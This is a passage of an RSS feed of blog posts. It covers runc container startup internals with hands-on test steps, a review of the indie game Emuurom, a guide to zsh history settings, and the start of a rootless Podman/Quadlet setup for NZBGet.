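        os.Exit(1)
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Whichever side opens the FIFO first simply waits for the other, which is why the created container can stay parked for as long as needed before it is started.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// libcontainer/container_linux.go (continued)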

func (c *Container) exec() error {
    path := filepath.Join(c.stateDir, execFifoFilename)
    if err := handleFifo(path, c.initProcess.pid()); err != nil { // [3]
        // [...]
    }

    return c.postStart() // run Poststart hook
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;2.4. Others&lt;/h3&gt;&lt;p&gt;If you want to test these behaviors directly with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt;, you can follow the steps below.&lt;/p&gt;&lt;p&gt;First, create a bundle directory to hold the root filesystem and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.json&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;mkdir container_bundle
cd container_bundle&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Then extract the root filesystem from a docker image into the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;rootfs&lt;/code&gt; directory.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;docker create --name temp ubuntu:24.04
mkdir rootfs
docker export temp | tar -C rootfs -xvf -
docker rm temp&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt; “spec” command can generate a default OCI spec &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.json&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;runc spec&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Modify &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.json&lt;/code&gt; to update the entry command.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;{
    &amp;quot;ociVersion&amp;quot;: &amp;quot;1.2.1&amp;quot;,
    &amp;quot;process&amp;quot;: {
        ...
-       &amp;quot;terminal&amp;quot;: true,
+       &amp;quot;terminal&amp;quot;: false,
        &amp;quot;args&amp;quot;: [
-           &amp;quot;sh&amp;quot;
+           &amp;quot;/usr/bin/sleep&amp;quot;, &amp;quot;3600&amp;quot;
        ]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Now you can create a container based on the bundle.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo runc create --bundle . my_container_id&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Listing all containers shows that ours is now in the created state.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo runc list
ID                PID         STATUS      BUNDLE                  CREATED                          OWNER
my_container_id   63886       created     /tmp/container_bundle   2026-06-04T03:54:00.492598105Z   root&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;If you list the file descriptors of the container’s init process, you can see that one of them is the FIFO file.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;ls -al /proc/63886/fd/
# [...]
l--------- 1 root root 64 Jun  4 11:55 7 -&amp;gt; /run/runc/my_container_id/exec.fifo
# [...]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;After starting the container, you can see our entry command &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sleep 3600&lt;/code&gt; is running now!&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo runc start my_container_id

ps aux | grep sleep
root       64268  0.0  0.0   2704  1688 ?        Ss   12:05   0:00 /usr/bin/sleep 3600&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h2&gt;3. Summary&lt;/h2&gt;&lt;p&gt;This post covers the process of loading a container, including the implementation of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;runc&lt;/code&gt;. In the next post, I will analyze runtime replacement and the hook interfaces exposed by Docker, using the NVIDIA Toolkit as an example.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Emuurom</title>
<link>https://buried-treasure.org/2026/06/emuurom/</link>
<guid isPermaLink="false">LlOizGwU9ke_2cUEZ6jSqw6o5CcMKUPwLFuQUw==</guid>
<pubDate>Fri, 19 Jun 2026 05:27:39 +0000</pubDate>
<description>PC, Mac, Linux Sometimes I play a game that’s so good, and so interestingly good, that I get too afraid to write about it. I’ve spent at least twenty hours playing Emuurom, and I suspect it could be a lot more, but have been putting off trying to explain it to you. Not because it, […]</description>
<content:encoded>&lt;p&gt;&lt;em&gt;PC, Mac, Linux&lt;/em&gt;&lt;/p&gt;&lt;p&gt;Sometimes I play a game that’s so good, and so interestingly good, that I get too afraid to write about it. I’ve spent at least twenty hours playing &lt;em&gt;Emuurom&lt;/em&gt;, and I suspect it could be a lot more, but have been putting off trying to explain it to you. Not because it, on the surface, is difficult to describe, or especially esoteric, but because I know that after all that time, I’ve really only played its surface, aware that there are layers beneath I’ve yet to comprehend, and – and I swear this is true – an entire language I’ve yet to learn and translate. I’ve put so much time into this game, and received so much joy from it, but I still fear that in covering it I’ll be getting it all wrong.&lt;/p&gt;&lt;p&gt;Then I remind myself that in 2024 I had a tremendous time playing what proved to only be the surface of &lt;em&gt;Animal Well&lt;/em&gt;, and that worked out fine. No one died. It’s fine. &lt;em&gt;Emuurom&lt;/em&gt; is a truly wonderful platforming metroidbrania that you can fully enjoy without digging beneath its surprisingly deep crust, and I need to get over that and just recommend you do.&lt;/p&gt;&lt;p&gt;So, given this, &lt;em&gt;Emuurom&lt;/em&gt; (a name that is impossible to remember, let alone spell) is a puzzle platformer about a young girl exploring a vast, pixelated world of interconnecting rooms, in which you need to scan every creature, plant and enemy in order to build your Emuudex of data, and indeed gather their secrets that will allow you to better understand how you can interact with this world. It’s a game that’s as much about figuring out how to play as it is to actually play it, taking the “brania” format to incredibly interesting places. There’s also absolutely no combat at all, and yet I genuinely didn’t notice for a very long time.&lt;/p&gt;&lt;p&gt;Gah, I’m already feeling like I’m messing this up. 
I want you to understand how the scanning isn’t just  data collection gimmick, but a core aspect of how you understand the game itself, a means of interaction that has intangible depths, and indeed a way of revealing so many meta secrets the game is hoping you will piece together. But I’m aware that while I’ve achieved this in a whole bunch of areas, I absolutely haven’t in others, and I know that I’ve not even tried to figure out the language that’s scattered throughout form the start. I should have! I should have sat down with pen and paper and got that done, but I’ve spent so much time playing this game on my Steam Deck in a comfy chair, and there were so many other angles to pursue.&lt;/p&gt;&lt;p&gt;This is a game that, I read on a Steam discussion, has a double-jump that only very few players have ever been able to figure out how to use, and if you do, it requires single-frame timing. You don’t &lt;em&gt;need&lt;/em&gt; it, and there’s also another way to get an extra couple of pixels on a jump that you can stumble on or eventually be explicitly told if you follow some breadcrumbs enough in one direction.&lt;/p&gt;&lt;p&gt;This is a game where I spent literally two hours figuring out how to reunite a duck with its ducklings, fighting against currents and ridiculously floppy fish to achieve it, just to be given a hint to a way I could have been interacting since the start of the game. There’s a way to fast travel in this game that I’ve never even used. I still haven’t managed to scan the sodding swan. 
That sodding swan.&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://buried-treasure.org/wp-content/uploads/2026/06/05_emuurom-1024x580.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/figure&gt;&lt;p&gt;Given all this, and given that the game has received in total &lt;a href=&quot;https://gamersocialclub.ca/2026/05/28/emuurom-review/&quot;&gt;a single review from one person’s blog&lt;/a&gt;, and only 195 Steam reviews, I then feel this weight of responsibility that I &lt;em&gt;have&lt;/em&gt; to make sure this game gets more attention. I’ll likely write an article about it on &lt;em&gt;Kotaku&lt;/em&gt; that’s far more professional than this one because I know about something this extraordinary and everyone else doesn’t, and that puts an onus on me to fix it. I’ll accurately call it “This Year’s &lt;em&gt;Animal Well&lt;/em&gt;” in the headline in the hope that this will convince skeptical readers to click. But this will remain my far more honest coverage.&lt;/p&gt;&lt;p&gt;This isn’t just incredibly smart in ways I find daunting, but crucially &lt;em&gt;Emuurom&lt;/em&gt; (one M, two Us) is outstandingly well-made. You can’t have a game that conceals this much complexity without also having a top layer that’s a fantastic game in its own right. It’s exquisitely well put together, and that’s even more ridiculous because I haven’t even mentioned that the entire game is posed as a product of an imaginary TIC-80 console, loosely based on the Pico-8, because developer borbware wanted to introduce “idiosyncratic retro restrictions.” Who is borbware?! How are they able to create something this extraordinary as their first Steam game? 
Now I need to play &lt;a href=&quot;https://borbware.itch.io/&quot;&gt;everything on their Itch page&lt;/a&gt; to try to understand this process.&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://buried-treasure.org/wp-content/uploads/2026/06/02_emuurom-1024x582.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/figure&gt;&lt;p&gt;It’s like finding proof of alien life and not knowing if anyone will believe me when I try to tell them about it. This is &lt;em&gt;too&lt;/em&gt; good. It’s even good in the way it’s bad, the annoying moments of controls (those damned fish in those damned currents) clearly being a deliberate design choice and my realising how their frustrations are actually integral to the experience. I’ve let my Patrons down by &lt;em&gt;not&lt;/em&gt; writing this review and leaving the site fallow yet again because I was procrastinating in order to put off figuring out how to express this experience.&lt;/p&gt;&lt;p&gt;And then what if someone plays it and says, “Yeah John, it’s a neat puzzle platformer, but get a grip.” I need you all to &lt;em&gt;believe&lt;/em&gt;, to feel like I do, like I’ve found a place in reality where I can put my hand through a solid object and feel the atoms. Not because it’s the best game ever! Not because it’s a profound game to play! Not because I have an emotional connection to it! None of that’s at all true! But because it feels like a bit of magic, and I need you to feel the magic too.&lt;/p&gt;&lt;figure&gt;&lt;img src=&quot;https://buried-treasure.org/wp-content/uploads/2026/06/03_emuurom-1024x580.jpg&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/figure&gt;&lt;p&gt;Or ignore this existential crisis and just recognise that I’ve played a super-good game that only costs £11, will give you long hours of excellent entertainment, and just pretend I didn’t lose my mind in the process of telling you about it. 
Probably that.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;borbware / Coyote Time Publishing&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://store.steampowered.com/app/1634360/EMUUROM/&quot;&gt;Steam&lt;/a&gt; (coming to &lt;a href=&quot;https://borbware.itch.io/emuurom&quot;&gt;Itch&lt;/a&gt; soon)&lt;/li&gt;&lt;li&gt;£11/$12.50/12.50€&lt;/li&gt;&lt;li&gt;&lt;a href=&quot;https://www.emuurom.com/&quot;&gt;Official site&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;em&gt;All Buried Treasure articles are funded by &lt;a href=&quot;https://www.patreon.com/buriedtreasure&quot;&gt;Patreon&lt;/a&gt; backers. If you want to see more reviews of great indie games, please consider &lt;a href=&quot;https://www.patreon.com/buriedtreasure&quot;&gt;backing this project&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;&lt;p&gt;93&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Prevent Kdenlive from Producing Millions of Log Lines on Linux</title>
<link>https://nickjanetakis.com/blog/prevent-kdenlive-from-producing-millions-of-log-lines-on-linux</link>
<guid isPermaLink="false">dbBRmAvlqGV-2vFV501zIlg4-gE1mtQkG-hvnQ==</guid>
<pubDate>Thu, 18 Jun 2026 19:16:49 +0000</pubDate>
<description>We&#39;ll go over how to disable Kdenlive&#39;s noisy logs so when you run journalctl it&#39;s not overtaking your output.</description>
<content:encoded>We&amp;#39;ll go over how to disable Kdenlive&amp;#39;s noisy logs so when you run journalctl it&amp;#39;s not overtaking your output.</content:encoded>
</item>
<item>
<title>tmux: Swapping Windows and Rotating Panes</title>
<link>https://nickjanetakis.com/blog/tmux-swapping-windows-and-rotating-panes</link>
<guid isPermaLink="false">zzP1Kw3fcW4LMVDyoc489u2_MtofDdxJfZFy9g==</guid>
<pubDate>Thu, 18 Jun 2026 19:16:49 +0000</pubDate>
<description>Here&#39;s a few handy shortcuts so you can rearrange whatever you&#39;re working on.</description>
<content:encoded>Here&amp;#39;s a few handy shortcuts so you can rearrange whatever you&amp;#39;re working on.</content:encoded>
</item>
<item>
<title>8 Useful Ways to Configure Your Zsh History — Nick Janetakis</title>
<link>https://nickjanetakis.com/blog/8-useful-ways-to-configure-your-zsh-history</link>
<enclosure type="image/jpeg" length="0" url="https://nickjanetakis.com/assets/blog/cards/8-useful-ways-to-configure-your-zsh-history.jpg"></enclosure>
<guid isPermaLink="false">AxUGNzoJ8IGSeltOx7B32Ld9Wv9Z-7G8cQUCmA==</guid>
<pubDate>Thu, 18 Jun 2026 19:16:49 +0000</pubDate>
<description>Being able to search your shell history is important, this will help you control where and how your commands get saved.</description>
<content:encoded>&lt;p&gt;Updated on June 2, 2026
in
&lt;a href=&quot;https://nickjanetakis.com/blog/tag/dev-environment-tips-tricks-and-tutorials&quot;&gt;#dev-environment&lt;/a&gt;, &lt;a href=&quot;https://nickjanetakis.com/blog/tag/linux-tips-tricks-and-tutorials&quot;&gt;#linux&lt;/a&gt;&lt;/p&gt;&lt;h1&gt;8 Useful Ways to Configure Your Zsh History&lt;/h1&gt;&lt;p&gt;&lt;img src=&quot;https://nickjanetakis.com/assets/blog/cards/8-useful-ways-to-configure-your-zsh-history-02d0b85d5a29da9d161d18f97fa48e31c65569e0c4798639bce3388ed6cd97a7.jpg&quot; alt=&quot;8-useful-ways-to-configure-your-zsh-history.jpg&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;h2&gt;Being able to search your shell history is important, this will help you
control where and how your commands get saved.&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;Prefer video? Here it is on YouTube.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;TL;DR:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# .zshrc file history related settings.
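# Sketch, an assumption rather than part of the original config: default
# XDG_CONFIG_HOME when it is unset so HISTFILE below does not resolve to
# /zsh/.zsh_history. This mirrors the fallback used for ZDOTDIR in ~/.zshenv.
: ${XDG_CONFIG_HOME:=${HOME}/.config}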

export HISTFILE=&amp;quot;${XDG_CONFIG_HOME}/zsh/.zsh_history&amp;quot;
export HISTSIZE=50000          # History lines stored in memory.
export SAVEHIST=50000          # History lines stored on disk.
setopt EXTENDED_HISTORY        # Save history with timestamps.
setopt INC_APPEND_HISTORY_TIME # Immediately append commands and track duration.
setopt HIST_IGNORE_ALL_DUPS    # Never add duplicate entries.
setopt HIST_IGNORE_SPACE       # Ignore commands that start with a space.
setopt HIST_REDUCE_BLANKS      # Remove superfluous whitespace from commands.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I’m constantly searching through my history with &lt;code&gt;CTRL+r&lt;/code&gt; using fzf. The above
helps access your history over an extended period of time but also helps gain
insights about how commands were run.&lt;/p&gt;&lt;p&gt;Besides finding a specific command, it helps answer questions like:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;When was the last time I ran this command?&lt;/li&gt;&lt;li&gt;How long did it take to run this specific command?&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Everything we’re about to cover here is included in
&lt;a href=&quot;https://github.com/nickjj/dotfriedrice&quot;&gt;DotFriedRice&lt;/a&gt;, so if you’re using that
project you’re already good to go.&lt;/p&gt;&lt;h3&gt;#
HISTFILE&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;export HISTFILE=&amp;quot;${XDG_CONFIG_HOME}/zsh/.zsh_history&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I like to follow the XDG specification when possible and don’t want to pollute
my home directory with a bunch of shell configuration so I keep everything zsh
related in &lt;code&gt;$XDG_CONFIG_HOME/zsh&lt;/code&gt;. The only exception is I have &lt;code&gt;~/.zshenv&lt;/code&gt;
which has &lt;code&gt;export ZDOTDIR=&amp;quot;${XDG_CONFIG_HOME:-&amp;quot;${HOME}/.config&amp;quot;}/zsh&amp;quot;&lt;/code&gt; so zsh
knows where to look.&lt;/p&gt;&lt;h3&gt;#
HISTSIZE / SAVEHIST&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;export HISTSIZE=50000 # History lines stored in memory.
export SAVEHIST=50000 # History lines stored on disk.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It’s ok to splurge a little disk space and memory. For context on my machine,
after 6 months of heavy terminal usage I have 4,937 items and it’s 245kb of
disk space. At my current pace, 50k would be about 5 years of shell history
coming in at under 2.5mb.&lt;/p&gt;&lt;p&gt;It’s likely even much longer than that because duplicate commands aren’t being
saved so all of those common commands I ran initially won’t be saved again.&lt;/p&gt;&lt;p&gt;If I ever get close to hitting 50k then doubling it to 100k wouldn’t be a
problem.&lt;/p&gt;&lt;p&gt;I haven’t set it to something really high like 500k because I
haven’t tested the implications of having that much shell history. I have 2
main concerns:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Your history will get read into memory every time you open a new shell and I want to make sure opening a new shell feels very fast&lt;/li&gt;&lt;li&gt;I use a zsh plugin that shows virtual text to auto-complete commands which does read your history and I want to make sure input latency when typing is effectively instant&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Even on my machine from 2014, I feel no delay yet. I don’t know what will
happen after 50k let alone 500k items. I’m not convinced I’d even hit 500k
unique items in multiple lifetimes on a desktop machine with a super heavy
terminal-based workflow. I’ll make sure to revisit this post if / when I
approach 50k.&lt;/p&gt;&lt;h3&gt;#
EXTENDED_HISTORY&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt EXTENDED_HISTORY # Save history with timestamps.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Knowing when you last ran a command is quite helpful when troubleshooting. For
example, maybe you ran a command to modify a udev setting and now you’re
noticing side effects but you want to know exactly when that setting was
applied because you want to compare it against logs you discovered elsewhere.&lt;/p&gt;&lt;p&gt;This is handy on desktop machines but it’s very useful on servers too and Bash
supports a similar option in case you’re not using zsh on your server.&lt;/p&gt;&lt;p&gt;If you’re concerned about disk space, don’t sweat it. The timestamp metadata
only adds about 1.2mb of space per 100,000 items.&lt;/p&gt;&lt;h5&gt;Here’s what that timestamp metadata looks like with a command:&lt;/h5&gt;&lt;pre&gt;&lt;code&gt;: 1780151606:28;man history&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;It’s actually quite clever. It starts with &lt;code&gt;:&lt;/code&gt; because that’s a built-in null
command that supports any number of arguments. Then the Unix timestamp is
passed in for when the command was run with the duration in seconds after that.&lt;/p&gt;&lt;p&gt;The semi-colon (&lt;code&gt;;&lt;/code&gt;) is used to split out the real command from your history.
In my case I was looking at the history’s manual for 28 seconds.&lt;/p&gt;&lt;p&gt;It’s clever because if you copy / paste that entire line into your shell it
will open the man pages for history because the metadata will do nothing.
Really cool pattern! Using a comment &lt;code&gt;#&lt;/code&gt; wouldn’t have worked because that
would comment out the command too.&lt;/p&gt;&lt;h5&gt;Viewing your extended history:&lt;/h5&gt;&lt;ul&gt;&lt;li&gt;&lt;code&gt;history&lt;/code&gt;: Show your history like usual&lt;/li&gt;&lt;li&gt;&lt;code&gt;history -i&lt;/code&gt;: Show your history with timestamps&lt;/li&gt;&lt;li&gt;&lt;code&gt;history -D&lt;/code&gt;: Show your history with duration&lt;/li&gt;&lt;li&gt;&lt;code&gt;history -iD&lt;/code&gt;: Show your history with both timestamps and duration&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;If time is something you want to filter on you can run &lt;code&gt;history -i 1&lt;/code&gt; to show
all of your history with timestamps.&lt;/p&gt;&lt;p&gt;You can do things like &lt;code&gt;history -i 1 | fzf&lt;/code&gt; to fuzzy search it in fzf or
&lt;code&gt;history -i 1 | grep 2026-06-&lt;/code&gt; to show only the history items from a specific month.&lt;/p&gt;&lt;h3&gt;#
INC_APPEND_HISTORY_TIME&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt INC_APPEND_HISTORY_TIME # Immediately append commands and track duration.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As soon as your command finishes running, it’ll get written out along with how
long it took to run. Knowing the duration is a quality of life enhancement.&lt;/p&gt;&lt;p&gt;With that said, if you have 2 terminals open (A and B) and you run a command in
terminal A, its history won’t automatically be put into terminal B’s
history. If you want A’s history in B right now you can run &lt;code&gt;fc -IR&lt;/code&gt; in B.
That’ll load all commands from your history file (&lt;code&gt;-R&lt;/code&gt;) that aren’t already
loaded (&lt;code&gt;-I&lt;/code&gt;) in your current shell on demand.&lt;/p&gt;&lt;h3&gt;#
HIST_IGNORE_ALL_DUPS&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt HIST_IGNORE_ALL_DUPS # Never add duplicate entries.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s say you run &lt;code&gt;whoami&lt;/code&gt; 2 times. On the first command, it will get appended
to your history. On the second command, zsh will notice it already exists,
delete all instances of it and append it to the end of your history. This way
you always end up with a single entry for that command, carrying the latest
timestamp.&lt;/p&gt;&lt;p&gt;The uniqueness check is on the full command with all arguments. For example
&lt;code&gt;echo hello&lt;/code&gt; and &lt;code&gt;echo world&lt;/code&gt; will produce 2 entries.&lt;/p&gt;&lt;p&gt;This means unique &lt;code&gt;cd&lt;/code&gt; paths will be included which is handy since their
arguments are different. I often run &lt;code&gt;cd&lt;/code&gt; then press &lt;code&gt;CTRL+r&lt;/code&gt; and use fzf to
narrow down paths. I’ve written about &lt;a href=&quot;https://nickjanetakis.com/blog/hooking-up-fzf-with-zsh-tab-complete-and-filtering-related-history&quot;&gt;this pattern&lt;/a&gt; before.&lt;/p&gt;&lt;h3&gt;#
HIST_IGNORE_SPACE&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt HIST_IGNORE_SPACE # Ignore commands that start with a space.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;I love this setting. It lets you run one-off commands you don’t want saved to
your history by starting the command with 1 or more spaces.&lt;/p&gt;&lt;p&gt;This could be a long multi-line shell script to test something that you don’t
want cluttering your history or anything you want. Maybe it’s a file path that
contains private information (client information, etc.).&lt;/p&gt;&lt;h3&gt;#
HIST_REDUCE_BLANKS&lt;/h3&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;setopt HIST_REDUCE_BLANKS # Remove superfluous whitespace from commands.&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This helps keep your history clean by squishing multiple adjacent spaces into 1
space. It also removes trailing whitespace and other unimportant blank
characters.&lt;/p&gt;&lt;p&gt;These are only the settings I use. You can check &lt;a href=&quot;https://zsh.sourceforge.io/Doc/Release/Options.html#History&quot;&gt;Zsh’s manual for shell
history&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;The video below covers some of these being used in a terminal.&lt;/p&gt;&lt;h3&gt;#
Demo Video&lt;/h3&gt;&lt;h4&gt;Timestamps&lt;/h4&gt;&lt;ul&gt;&lt;li&gt;0:36 – HISTFILE&lt;/li&gt;&lt;li&gt;1:31 – HISTSIZE / SAVEHIST&lt;/li&gt;&lt;li&gt;4:27 – EXTENDED_HISTORY&lt;/li&gt;&lt;li&gt;8:01 – INC_APPEND_HISTORY_TIME&lt;/li&gt;&lt;li&gt;9:37 – HIST_IGNORE_ALL_DUPS&lt;/li&gt;&lt;li&gt;11:16 – HIST_IGNORE_SPACE&lt;/li&gt;&lt;li&gt;13:00 – HIST_REDUCE_BLANKS&lt;/li&gt;&lt;li&gt;13:39 – The manual has more options&lt;/li&gt;&lt;li&gt;14:00 – Sharing your history between terminals&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;How do you have your zsh history configured? Let me know below.&lt;/strong&gt;&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Installing NZBGet, Radarr, and Sonarr on Rootless Podman and Quadlet</title>
<link>https://matt3o.com/installing-nzbget-radarr-and-sonarr-on-rootless-podman-and-quadlet/</link>
<enclosure type="image/jpeg" length="0" url="https://matt3o.com/installing-nzbget-radarr-and-sonarr-on-rootless-podman-and-quadlet/podman.jpg"></enclosure>
<guid isPermaLink="false">jQjair3q6H_rDPMNBbeJFBiGokUAZl1vx8Shvg==</guid>
<pubDate>Thu, 18 Jun 2026 09:26:32 +0000</pubDate>
<description>Time for some geeking out. I’m one of those fools who like to run their own local server with no cloud shenanigans. I’ve been running an Ubuntu server for a while with a bunch of individually installed services, but I wanted to try something more compartmentalized, easier to maintain and update. The obvious choice would have been Docker, but I like to make my life complicated so I installed Fedora with the plan of using Podman with Quadlet.</description>
<content:encoded>&lt;p&gt;Time for some geeking out. I’m one of those fools who like to run their own local server with no cloud shenanigans. I’ve been running an Ubuntu server for a while with a bunch of individually installed services, but I wanted to try something more compartmentalized, easier to maintain and update. The obvious choice would have been Docker, but I like to make my life complicated so I installed Fedora with the plan of using &lt;strong&gt;Podman with Quadlet&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;This post is mostly a note-to-self so I have some documentation of the process next time I need to reinstall everything.&lt;/p&gt;&lt;p&gt;I assume you already have Fedora (44 in my case) and podman installed. The first thing to do is to create the &lt;code&gt;~/.config/containers/systemd&lt;/code&gt; directory in your home for Quadlet to use:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir -p ~/.config/containers/systemd&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;nzbget, radarr and sonarr all need to talk on the same network, so we need to create a custom network for them. This is something I haven’t seen mentioned in other tutorials, but without this step I wasn’t able to get them to communicate properly.&lt;/p&gt;&lt;p&gt;In the directory we just created, add a file called &lt;code&gt;~/.config/containers/systemd/arr.network&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Network]
NetworkName=arr_net&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After a recent update, the DNS resolution inside the containers wasn’t working anymore. If you have the same issue you can also add the following lines to the file:&lt;/p&gt;&lt;p&gt;Next we need the volumes for the containers. I have a big storage drive mounted at &lt;code&gt;/mnt/storage&lt;/code&gt; where I keep all my media and related files, so I created the following directories:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot;&gt;mkdir -p /mnt/storage/media/{nzbget,radarr,sonarr,downloads,Movies,TV}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Remember that we are creating a rootless setup, so we need to make sure that the user running the containers is the same as the owner of the files and directories; in my case it is &lt;code&gt;matteo&lt;/code&gt;.&lt;/p&gt;&lt;h2&gt;NZBGet
&lt;/h2&gt;&lt;p&gt;Now we start configuring the actual containers. First NZBGet. Create a file called &lt;code&gt;~/.config/containers/systemd/nzbget.container&lt;/code&gt; with the following content:&lt;/p&gt;&lt;div&gt;&lt;pre&gt;&lt;code class=&quot;language-ini&quot;&gt;[Unit]
Description=NZBGet
After=network-online.target

[Container]
Image=ghcr.io/nzbgetcom/nzbget:latest
ContainerName=nzbget

# Environment variables
Environment=PUID=0
Environment=PGID=0
Environment=TZ=Europe/Rome

# Ports and Volumes
Network=arr.network
PublishPort=6789:6789
Volume=/mnt/storage/media/nzbget:/config:Z
Volume=/mnt/storage/media/downloads:/downloads:z

# This enables automatic updates
AutoUpdate=registry

[Service]
Restart=always
TimeoutStartSec=900

[Install]
WantedBy=default.target&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The file is pretty basic. The only things to note are that we are using the custom network we created before (&lt;code&gt;Network=arr.network&lt;/code&gt;) and that we are mounting the volumes with the &lt;code&gt;:Z&lt;/code&gt; and &lt;code&gt;:z&lt;/code&gt; options to make sure SELinux doesn’t get in the way. It’s important to note the difference between uppercase and lowercase &lt;code&gt;Z&lt;/code&gt; here: the former applies a private label so that only this container can access the volume, while the latter applies a shared label so that other containers can access it as well. Of course we want the &lt;code&gt;downloads&lt;/code&gt; volume to be accessible from radarr and sonarr, so we use &lt;code&gt;:z&lt;/code&gt; (lowercase) for that one.&lt;/p&gt;&lt;p&gt;Also note that we are setting &lt;code&gt;PUID&lt;/code&gt; and &lt;code&gt;PGID&lt;/code&gt; to &lt;code&gt;0&lt;/code&gt;. In a perfect world we would want to set these to the actual user and group IDs (eg: 1000), and then use &lt;code&gt;podman unshare chown&lt;/code&gt; to change the ownership of the directory &lt;code&gt;/mnt/storage/media&lt;/code&gt;. That totally works, but then I can’t access the files and directories directly from the host without using &lt;code&gt;sudo&lt;/code&gt;. Setting &lt;code&gt;PUID&lt;/code&gt; and &lt;code&gt;PGID&lt;/code&gt; to &lt;code&gt;0&lt;/code&gt; might not be ideal but it seems to work. Let me know if you have a better solution for this. Remember that setting them to &lt;code&gt;0&lt;/code&gt; in a non-root environment doesn’t give the container root privileges, so it shouldn’t be a security issue.&lt;/p&gt;&lt;p&gt;Let’s give nzbget a try before moving on to the other containers. Run the following commands to 